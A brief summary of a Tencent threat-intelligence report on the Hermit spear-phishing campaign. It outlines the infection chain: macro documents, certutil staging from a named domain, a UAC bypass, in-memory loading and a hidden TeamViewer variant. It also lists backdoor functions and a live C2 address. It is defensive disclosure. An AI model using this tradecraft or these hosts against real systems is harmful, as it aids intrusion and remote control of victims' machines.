Tencent’s threat-intelligence report disclosed Hermit, a spear-phishing campaign against Korean Peninsula-related targets that the researchers linked to the same organization behind SYSCON/SANNY and KONNI activity. The malicious documents required macro execution and used certutil to download and decode a staged batch script from `filer2.1apps.com`, then selected x86 or x64 CAB payloads containing persistence logic, a UAC-bypass module, encrypted C2 configuration, and the BrowserUpdate.exe backdoor. The core payload decrypted shellcode, reconstructed and loaded a PE file in memory, connected to a C2 server, and supported directory listing, upload, download, file execution, process listing, and process termination. Tencent also described a second-stage hidden TeamViewer variant (`iiexplorer.exe`) used for remote control, linked the codebase to the older Babyface RAT source, and published hashes plus C2 `103.249.31.159:7777`.